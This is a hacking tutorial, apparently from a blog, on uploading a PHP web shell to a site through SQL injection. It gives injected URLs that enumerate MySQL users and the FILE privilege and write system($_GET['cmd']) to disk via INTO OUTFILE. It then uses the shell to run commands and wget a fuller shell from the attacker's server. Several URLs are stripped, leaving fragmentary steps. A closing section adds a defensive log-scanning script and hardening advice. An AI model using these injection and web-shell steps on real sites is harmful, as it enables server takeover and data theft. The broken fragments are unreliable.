Shell Uploading Via SQL Injection

In this tutorial I will show you how to upload a shell via SQLi.

This method is useful when you have admin info and can't upload anything, or when you have admin info but can't find the admin login, and so on.

But this method is very rare!

Anyways let's start with our tutorial...

Things we will need:

1)  Your shell source in .txt format (I will use
2)  Basic SQLi skill

So let's say you injected our site like this:,2,3,4--

Now you have the admin info, you logged in, and you failed to upload a shell.
This is where our method comes in.
Remember which column you should use. (Mine will be 3.)

In your vulnerable column type "user", and at the end add "from mysql.user", so the URL would look like: newsnomber=-999+union+select+1,2,user,4+from+mysql.user--

NOTE: If you get an error after this you can't use this

You should get the current user for the site.


Good. Remember it, because you will need it.

Now we check the user's file privilege.

In your column type: "group_concat(user,0x3a,file_priv)" newsnomber=-999+union+select+1,2,group_concat(user,0x3a,file_priv), er--

Now you should get all users and their privileges.


Now our user was "moto25_moto25"...
That means we can make files on the server.
Let's go to the next step.

To create a file on the server you need to find the site's full path.

To do that you must cause an error; hopefully that error will give us the site's path.

We got ours:


After that we must find a writeable folder on the server.
Just browse around or scan it with Acunetix.
Usually the public_html folder is writeable.
For our example I used

So spawning our shell is easy as 1,2,3..
Let's get back at our injection.,2,3,4--

Our column should be our php line.
In there we type:

" system($_GET['cmd']); ?>"

NOTE: Quotation marks are required

All other columns should be "null",null," system($_GET['cmd']); ?>",null--

And at the end we use "INTO OUTFILE" function.,null," system($_GET['cmd']); ?>",null INTO OUTFILE--

Now we use site's full path and writeable folder:


Now,null," system($_GET['cmd']); ?>",null INTO OUTFILE /var/www/vhost/moto25/data/www/

And our file name and extension.,null," system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/moto25/data/www/"--

Now, our shell should be spawned.
We now check if our file is created.

You should get something like:

Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/phpcmd.php on line 1

That means we have our file created! Yeh…….!
We check if it is working: -la

We can see all files in current directory!
And simple command to download a shell: -O egy.php


wget - Downloads textual file on our server (egy.txt). -O - Renames it to egy.php

Game over!
I hope you learned something more interesting ..
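
From the defender's side, each stage above (the UNION SELECT probe, the mysql.user / file_priv lookup, the INTO OUTFILE write, and the follow-up request with a cmd parameter) leaves a trace in the web server's access log. The script below is an added example, not part of the original tutorial: it normalizes request targets and flags those stages per client. The log lines are constructed, and the host addresses, /news.php and the placeholder output path are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Stage -> pattern, matched against the decoded, lower-cased request target.
STAGES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "priv_enum": re.compile(r"\bmysql\.user\b|\bfile_priv\b"),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "cmd_param": re.compile(r"\.php\?(?:\S*&)?cmd="),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
# Constructed access-log lines (combined log format); addresses and paths are made up.
FMT = '{} - - [01/Jan/2024:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [FMT.format(ip, t) for ip, t in [
    ("203.0.113.7", "/news.php?newsnomber=12"),
    ("203.0.113.7", "/news.php?newsnomber=-999+union+select+1,2,user,4+from+mysql.user--"),
    ("203.0.113.7", "/news.php?newsnomber=-999+union+select+null,null,%22X%22,null+into+outfile+%22/placeholder/x.php%22--"),
    ("203.0.113.7", "/phpcmd.php?cmd=EXAMPLE"),
    ("198.51.100.4", "/news.php?topic=union-select-committee"),  # benign look-alike
]]

def normalize(target):
    """Undo up to three layers of URL encoding, drop /* */ comments, fold case."""
    for _ in range(3):
        target = unquote_plus(target)
    target = re.sub(r"/\*.*?\*/", " ", target, flags=re.S)
    return re.sub(r"\s+", " ", target).lower()

def classify(line):
    """Return (client_ip, sorted stage names) for a suspicious line, else None."""
    m = REQUEST.match(line)
    text = normalize(m.group(2)) if m else ""
    hits = sorted(name for name, rx in STAGES.items() if rx.search(text))
    return (m.group(1), hits) if hits else None

def scan(lines):
    """Group stages by client so a complete chain from one address stands out."""
    seen = {}
    for ip, hits in filter(None, map(classify, lines)):
        seen.setdefault(ip, set()).update(hits)
    return seen

def wrote_and_used_file(seen):
    """Clients that attempted INTO OUTFILE and also requested a .php with cmd=."""
    return sorted(ip for ip, s in seen.items() if {"file_write", "cmd_param"} <= s)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), wrote_and_used_file(scan(SAMPLE_LOG)))
```

Revoking the FILE privilege from the application's MySQL account and setting secure_file_priv removes the file-write step that this whole method depends on.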



This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.
